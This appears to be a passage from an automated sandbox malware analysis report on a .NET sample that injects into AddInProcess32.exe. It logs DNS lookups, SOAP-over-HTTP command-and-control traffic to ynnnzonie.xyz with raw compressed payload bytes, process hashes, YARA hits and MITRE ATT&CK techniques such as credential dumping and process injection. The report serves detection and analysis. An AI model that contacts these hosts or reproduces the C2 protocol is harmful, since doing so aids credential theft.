Apr 8, 2021 10:35:25.415061951 CEST	8.8.8.8	192.168.2.4	0xbf53	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 10:35:29.360119104 CEST	8.8.8.8	192.168.2.4	0xeae1	No error (0)	ynnnzonie.xyz		104.217.62.116	A (IP address)	IN (0x0001)
Apr 8, 2021 10:35:30.595547915 CEST	8.8.8.8	192.168.2.4	0x7aea	No error (0)	ynnnzonie.xyz		104.217.62.116	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ynnnzonie.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49721	104.217.62.116	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:35:23.394460917 CEST	1738	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ynnnzonie.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Apr 8, 2021 10:35:23.548971891 CEST	1742	IN	HTTP/1.1 100 Continue
Apr 8, 2021 10:35:24.088841915 CEST	1744	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Apr 2021 08:35:24 GMT Content-Type: text/xml; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 34 30 37 0d 0a 1f 8b 08 00 00 00 00 00 02 03 bd 58 6d 6f e2 38 10 fe 2b a8 52 a5 bb 6a 4b ba d7 bb de 0a b1 48 bc 04 8a b6 d0 1c a1 dd bb 53 be 18 67 0a 3e 1c 4f 64 3b 05 aa fd f1 e7 84 84 16 9a 5d 89 98 3b 09 91 e4 99 f1 e3 f1 78 3c 1e bb a9 1a ae 78 06 8e 31 d4 d6 11 17 aa a1 3e 9f 2d b4 8e 1b 8e a3 e8 02 22 a2 ea 06 57 48 e2 3a ca b9 93 be 38 90 b7 70 ce 5a 4d d5 e8 60 b8 69 35 07 a0 db 72 9e 44 20 b4 9a 80 8a 51 a8 9c 71 c7 a7 21 8a 13 c9 32 9e b3 77 2d 12 ae 73 0b c8 e7 b3 8e c4 95 02 e9 ae 35 08 c5 50 9c e5 22 b6 23 5b ad 56 f5 d5 75 c6 f5 cb d5 d5 47 e7 cf d1 9d 9f d9 7b c9 84 d2 44 50 30 5d 90 46 87 23 5d 42 d8 c5 44 68 b9 c9 59 66 ef 86 18 31 2a 51 e1 93 ae 53 8c 52 c2 6b e7 e3 95 e3 83 64 84 b3 17 a2 8d 09 4e 5b 4a b2 51 86 75 d6 50 5a 32 31 6f f5 27 4d 67 f7 f1 0a 3f b4 4b e1 ee df a5 f0 ed 97 52 d8 bb 2d 85 07 9d 52 f8 3b 96 78 e5 dc 3d b7 dc c0 71 29 3c bc 2b 87 f7 b4 9d 43 57 bf 71 fe d0 3b 85 df 9d 94 f1 7e f6 0f 50 fd 6b eb 89 70 05 69 a7 05 b0 93 dd 1c ca 6e 52 99 4f 89 c8 63 4a b5 b4 4c 32 f9 1e 98 2b 75 17 12 23 28 50 8f e8 85 3a 71 d0 9c 3f f8 ee c4 9b dc f7 87 77 ee 79 d0 8e e3 1e d1 24 b8 43 4a 78 90 f5 ce 92 28 78 30 bd d7 52 41 a9 eb 7f 44 31 40 9c 73 d8 32 81 35 cf 4f eb 4f 37 3f db 90 4d 90 44 46 1a dc c7 20 49 cd 37 ce 5a 11 09 c1 d1 e6 8c 48 cc c1 d7 49 c8 30 37 c7 e3 89 b2 18 df 50 b2 d0 ce d3 bf fb 9a c8 fc bf 3a 4b d7 a4 bf 3c dc 6c 58 16 10 a2 b6 20 78 64 cf 84 87 cc 82 e1 8b 99 13 f3 51 9d c0 e5 90 ed 05 35 7b 77 b8 31 a3 35 4f 9a 31 d1 cd 09 e8 92 2e be 8c 20 64 66 74 92 08 0b a2 3e 08 c9 64 6d 28 68 e0 73 60 b1 60 f2 b7 40 81 d6 e9 12 89 30 4c 38 a8 5d 12 78 64 b0 02 79 7c 28 98 57 ce 04 19 48 4c e2 a0 cb 4c 0b b4 89 2c c4 15 8a e2 51 9d 87 33 98 11 1b 43 fe 30 db 88 9f c8 27 0b 8a 7b 39 63 da 6a cd 77 d1 cc 12 06 3d 49 e6 56 de 68 47 6c be 75 86 05 c9 14 25 5d 58 b4 ff 8b 88 10 d6 f9 e3 04 39 68 eb 9b ea 04 d7 37 57 85 15 f6 d6 8c c8 5a 2f 50 5c db 64 b4 cb 91 29 73 6d a6 d9 8f 13 2d d8 72 f7 ac ce 34 66 d4 76 47 ef 22 35 bf 13 b8 d6 32 09 66 f9 cd 2e 52 46 84 f1 fa 24 09 da 1a 6d 56 73 47 92 67 d8 d5 24 d9 d7 e5 09 22 af 28 0b 03 37 9c db 4c d8 f8 71 d8 1b b6 6b 5d 94 31 ca ac 9c 2c a0 01 f4 cd da 87 9a bb 36 65 15 03 73 d8 39 3e 34 35 90 e8 f8 b9 93 9b 58 e3 94 cc 7e bc ab 3a df 2d a6 8b 3a bb c7 14 45 19 be 16 eb 6f c1 5c a7 3f f5 f6 e5 29 50 c8 98 d9 2a f7 2a f9 2d f2 56 fc 9f 54 ef 89 19 4a 2c f1 c9 74 70 1e f4 40 2d 35 c6 df 2e ea 7a ad 3f 5c d4 43 a4 17 1f 2e 96 b0 31 ff 2b c2 39 68 f3 a2 00 c2 8b 6f 57 e5 be de a7 43 ba 3d 0e 1f 4d e8 1c 0e bb 70 c4 00 e8 12 ff ff e3 4c 51 f6 8f f0 85 71 4e 82 3e 93 f0 84 eb 0a 07 87 af 44 83 ac d6 34 cb df 80 a2 42 d3 e9 22 31 9b a2 29 17 64 58 a1 75 be 13 0e 29 6c 0b 85 0a 14 9f 62 a0 6b 95 9d 77 4c 45 b8 99 55 f5 c1 d8 9d 0e da 53 b7 36 05 ba 10 c8 71 ce 4c 85 d9 e1 84 2e 6f c9 aa 02 df 08 51 d0 05 e3 a1 29 af 4d bd 4a d3 a8 50 81 47 38 d4 52 51 49 4c be 8f c0 22 36 7d 2a 01 c4 fe 12 cf b1 42 23 4d 52 07 0a 19 94 cb a7 66 7e e7 f2 50 65 87 e6 5a 8f de 78 5f 21 05 72 d9 d7 6c 51 ed 67 92 02 6b 3a ef af a8 de 83 d9 4d 97 81 8b 8b 30 e7 f5 46 ad f5 2f d5 1f 59 38 5e 13 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 407Xmo8+RjKHSg>Od;];x<x1>-"WH:8pZM`i5rD Qq!2w-s5P"#[VuG{DP0]F#]BDhYf1QSRkdN[JQuPZ21o'Mg?KR-R;x=q)<+CWq;~PkpinROcJL2+u#(P:q?wy$CJx(x0RAD1@s25OO7?MDF I7ZHI07P:K<lX xdQ5{w15O1. dft>dm(hs``@0L8]xdy\|(WHLL,Q3C0'{9cjw=IVhGlu%]X9h7WZ/P\d)sm-r4fvG"52f.RF$mVsGg$"(7Lqk]1,6es9>45X~:-:Eo\?)P-VTJ,tp@-5.z?\C.1+9hoWC=MpLQqN>D4B"1)dXu)lbkwLEUS6qL.oQ)MJPG8RQIL"6}B#MRf~PeZx_!rlQgk:M0F/Y8^0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49723	104.217.62.116	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:35:29.516884089 CEST	1750	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest" Host: ynnnzonie.xyz Content-Length: 24598 Expect: 100-continue Accept-Encoding: gzip, deflate
Apr 8, 2021 10:35:29.673566103 CEST	1750	IN	HTTP/1.1 100 Continue
Apr 8, 2021 10:35:30.547687054 CEST	1800	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Apr 2021 08:35:30 GMT Content-Type: text/xml; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 45 ce cd 0a 83 30 10 04 e0 57 29 79 00 f7 1e d2 1c 0a 7d 01 0b bd 07 bb fe 80 c9 6e 33 51 ea db b7 8a d5 db 30 30 1f e3 60 ef 69 e6 51 94 2f 9f 38 26 58 5c 4d 5f 8a 5a 22 34 3d c7 80 ea d7 43 82 56 92 3b 5a 03 f1 be 20 e3 1d ec 4d 5e 8b 77 4f ce 43 bb 3c 9a 90 6a 7e 4f 8c 52 33 54 12 76 f6 40 0b 47 9d f2 b0 61 86 bc a3 3f 40 e7 13 ff 05 5c 3b 8e 2a 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83E0W)y}n3Q00`iQ/8&X\M_Z"4=CV;Z M^wOC<j~OR3Tv@Ga?@\;*0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49726	104.217.62.116	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:35:30.752043009 CEST	1801	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: ynnnzonie.xyz Content-Length: 24584 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Apr 8, 2021 10:35:30.906255007 CEST	1801	IN	HTTP/1.1 100 Continue
Apr 8, 2021 10:35:31.786695004 CEST	1826	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Apr 2021 08:35:31 GMT Content-Type: text/xml; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 65 8f c1 0a c2 30 0c 86 5f 45 7a 77 99 7a 2b 5d 0f 03 f1 a2 17 45 f0 5a b6 e0 0a 5b 5b 96 cc ce b7 77 8e 3a 41 6f e1 4f f2 e5 8b 22 b9 77 0f 6c 7d c0 d5 d8 b5 8e 24 15 a2 61 0e 12 80 aa 06 3b 43 d9 94 93 37 21 f3 fd 1d de 05 60 da 00 a1 15 c9 d2 d7 4f ad 0e c8 d7 50 1b 46 3a 23 05 ef 28 f1 16 1a 63 17 86 de ce 14 f1 33 3f b4 9c ae 9b 42 94 bd 8f 84 fd 7e 64 74 64 bd 13 a9 65 17 54 8c 31 8b bb 99 b4 cd f3 0d dc 4e c7 cb ec ba b6 8e d8 b8 0a 05 68 05 ff 4a 53 f8 f1 85 ef e3 fa 05 18 8f 8c 84 05 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3e0_Ezwz+]EZ[[w:AoO"wl}$a;C7!`OPF:#(c3?B~dtdeT1NhJS0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 8, 2021 10:35:04.991049051 CEST	81.177.140.169	443	192.168.2.4	49719	CN=*.beablog.ru CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Mar 24 18:33:27 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Tue Jun 22 19:33:27 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
Apr 8, 2021 10:35:04.991049051 CEST	81.177.140.169	443	192.168.2.4	49719	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		3b5074b1b5d032e5620f69f9f700ff0e

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: YZ1q5HY7kK.exe PID: 6884 Parent PID: 5968

General

Start time:	10:35:01
Start date:	08/04/2021
Path:	C:\Users\user\Desktop\YZ1q5HY7kK.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\YZ1q5HY7kK.exe'
Imagebase:	0xb90000
File size:	44032 bytes
MD5 hash:	77DFC735D37C3F44AB13D253CCD5417C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000002.651607493.0000000002FDB000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000002.653277688.0000000004009000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	low

Analysis Process: AddInProcess32.exe PID: 7088 Parent PID: 6884

General

Start time:	10:35:05
Start date:	08/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Imagebase:	0xc60000
File size:	42080 bytes
MD5 hash:	F2A47587431C466535F3C3D3427724BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report YZ1q5HY7kK.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics